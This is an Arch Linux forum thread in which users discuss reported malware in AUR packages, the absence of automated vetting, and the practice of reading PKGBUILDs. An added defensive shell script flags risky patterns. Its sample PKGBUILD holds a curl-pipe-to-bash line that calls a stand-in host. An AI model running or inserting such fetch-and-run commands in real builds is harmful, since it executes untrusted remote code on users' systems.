
#1 2025-08-07 01:40:08

millus
Member
Registered: 2019-07-21
Posts: 235

Any team notes about malware incidents?

I just read in some tech news that AUR had repeatedly inserted some malware.
Is there some official posting here that has info/guidelines for users about AUR usage and the situation? I searched forum for "malware" but didn't find anything, so the only info I got so far was from random tech news sites :/

Offline

#2 2025-08-07 04:48:14

mpan
Member
Registered: 2012-08-01
Posts: 1,526
Website

Re: Any team notes about malware incidents?

Yes, the Arch User Repository article in the wiki.

AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

Last edited by mpan (2025-08-07 04:48:59)


Paperclips in avatars? | Sometimes I seem a bit harsh — don’t get offended too easily!

Offline

#3 2025-08-07 11:01:15

millus
Member
Registered: 2019-07-21
Posts: 235

Re: Any team notes about malware incidents?

That page doesn't say anything about the current situation and which packages are or were affected or whether there is any kind of scanning/checking going on or whatever really.

Offline

#4 2025-08-07 11:35:31

close2zero
Member
From: Norway
Registered: 2025-07-14
Posts: 65

Re: Any team notes about malware incidents?

I second mpan's post regarding your question. It says that you use it at your own risk. Isn't that all the information you need? And by the way: Arch Linux is not a corporation, but a community of volunteers. If you want that list why don't you do the work yourself? Who is stopping you? Just a suggestion.

[Edit] Typo.

[Edit] Set the correct name I referred to, as pointed out by seth.

Last edited by close2zero (2025-08-07 14:49:27)


while true; do mount /dev/close2zero /mnt/clarity; done

Offline

#5 2025-08-07 12:05:26

Lone_Wolf
Administrator
From: Netherlands, Europe
Registered: 2005-10-04
Posts: 14,485

Re: Any team notes about malware incidents?

Subscribe to aur-general ML or check its aur general ML archives frequently.

> whether there is any kind of scanning/checking going on

Nothing automated, all scanning/checking relies on AUR users doing it and reporting their findings.


Disliking systemd intensely, but not satisfied with alternatives so focusing on taming systemd.

clean chroot building not flexible enough ?
Try clean chroot manager by graysky

Offline

#6 2025-08-07 13:54:18

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,002

Re: Any team notes about malware incidents?

@close2zero, millus is the OP…

@millus

> That page doesn't say anything about the current situation and which packages are or were affected

isn't the same question as

> Is there some official posting here that has info/guidelines for users about AUR usage and the situation?

Given the frequency with which we're referring to the news page/feed, channeling this through phoronix etc (and providing them clicks…) is probably the most effective way to communicate such incidents :P

But in general you'll have to operate on the assumption that this happens all the time. And it will get worse the more popular Arch and derivatives are.

The AUR is a somewhat maintained infrastructure to allow Arch users to share PKGBUILDs.
It still very much *is* "random stuff I found on the internet" and you have to treat it like this. Always.
Being particularly convenient to find doesn't change that at all.
Think of it as Schrödinger's software - benign and malicious until you read the PKGBUILD.

It is the major concern and complaint about pacman wrapping AUR helpers that they blend repos and AUR which allows this kind of attack to promise any success.

Offline

#7 2025-08-07 14:35:10

cryptearth
Member
Registered: 2024-02-03
Posts: 1,828

Re: Any team notes about malware incidents?

I guess you refer to https://www.golem.de/news/forscher-warn … 98822.html and the recent withdrawal of the duckstation dev

well - Linux uses package managers for a very long time - on windows we're used to download random executables from the internet - which is worse? none - it's both the user's responsibility - no more active news needed

Offline

#8 2025-08-07 14:42:26

seth
Member
From: Don't DM me only for attention
Registered: 2012-09-03
Posts: 71,002

Offline

#9 2025-08-07 15:05:05

mpan
Member
Registered: 2012-08-01
Posts: 1,526
Website

Re: Any team notes about malware incidents?

millus wrote:

> That page doesn't say anything about the current situation and which packages are or were affected or whether there is any kind of scanning/checking going on or whatever really.

I wouldn’t say there is any “current situation.” As in: there is nothing out of order.

Like with any other communication channel, people try to convince AUR users to run software those users may not wish to run. This is a continuous, stable situation. Here is a well documented example from 2018. But most go unnoticed. At best they’re mentioned in ML, because somebody reports their findings this way.

For this reason I don’t really see what kind of official response is expected. The official response is the same as it always is: removal.


Paperclips in avatars? | Sometimes I seem a bit harsh — don’t get offended too easily!

Offline

#10 2025-08-07 15:30:34

close2zero
Member
From: Norway
Registered: 2025-07-14
Posts: 65

Re: Any team notes about malware incidents?

Just to clarify my earlier tone: I didn't mean to come off as dismissive, and I see now that the original question may have been more about current visibility and community hygiene than basic AUR usage. Still, I do think it's important to re-emphasize what both mpan and seth touched on: there's no "new" situation. The nature of the AUR hasn't changed – it has always been a place where trust must be earned, not assumed. The illusion of safety just because a helper wraps it in a convenient interface is exactly what increases risk. It’s also why official "incident reports" don’t really fit the model. As soon as a package is confirmed malicious, it’s removed. The rest is up to users staying informed, reading PKGBUILDs, checking install scripts, and maybe even auditing binaries if necessary.

If this thread helps more people understand that, the better it is for us all.


while true; do mount /dev/close2zero /mnt/clarity; done

Offline
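An added example, not part of any post in this thread: a small triage helper for the "read the PKGBUILD, check the install script" step mentioned above. It only points a reader at lines worth reading and does not decide whether a package is safe. The function names, tags and the sample PKGBUILD (with its `example.invalid` URLs) are constructed for illustration.

```shell
#!/bin/sh
# Added example: pre-build triage of a PKGBUILD. Prints "LINE [tag] text" for
# every line a human should read before running makepkg.

flag() {  # flag TAG REGEX FILE -> matching lines, prefixed with line number and tag
    grep -nE -- "$2" "$3" | sed "s/^\([0-9][0-9]*\):/\1 [$1] /" || true
}

review_pkgbuild() {  # review_pkgbuild FILE
    {
        # download piped straight into an interpreter
        flag pipe-to-shell '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh' "$1"
        # content that is decoded or evaluated at build time
        flag decode-or-eval '(base64[[:space:]]+(-d|--decode))|(^|[^[:alnum:]_])eval[[:space:]]' "$1"
        # an install scriptlet is run by pacman as root: read that file as well
        flag install-script '^[[:space:]]*install=' "$1"
        # SKIP is normal for VCS sources but means nothing pins the download
        flag checksum-skipped '(^|[^A-Za-z_])SKIP([^A-Za-z_]|$)' "$1"
        # every remote location, to compare against the real upstream project
        flag url '(https?|git|ftp)://' "$1"
    } | sort -n
}

make_sample() {  # make_sample FILE -> writes a constructed PKGBUILD for the demo
    cat > "$1" <<'EOF'
pkgname=example-bin
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-1.0.tar.gz")
sha256sums=('SKIP')
install=example.install
package() {
    curl -s https://example.invalid/setup.sh | bash
    install -Dm755 example "$pkgdir/usr/bin/example"
}
EOF
}

# Demo run on the constructed sample
demo=$(mktemp) && make_sample "$demo" && review_pkgbuild "$demo"
rm -f "$demo"
```

An empty result means none of these patterns matched, not that the package is benign; the PKGBUILD and any `.install` file still need to be read in full.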

#11 2025-08-07 20:24:44

mpan
Member
Registered: 2012-08-01
Posts: 1,526
Website

Re: Any team notes about malware incidents?

To clarify my own tone too, also to not sound as if I’m ignoring millus’ worries: I suspect OP has been misled by news reporting.

Your heart is at the right place and your concerns are reasonable. But from my perspective it is “just another one.” A repeating event, not showing a worrying rise in intensity. Most importantly: something normal and expected for a service offering free exchange of information between random people.

Close2zero is correct regarding AUR helpers. Among those without a proper mental model of AUR, helpers contribute to increasing risks.


Paperclips in avatars? | Sometimes I seem a bit harsh — don’t get offended too easily!

Offline

#12 2025-08-07 22:02:57

millus
Member
Registered: 2019-07-21
Posts: 235

Re: Any team notes about malware incidents?

thanks for uwu answers, got it. Also, Phoronix is great, will continue checking.

Offline
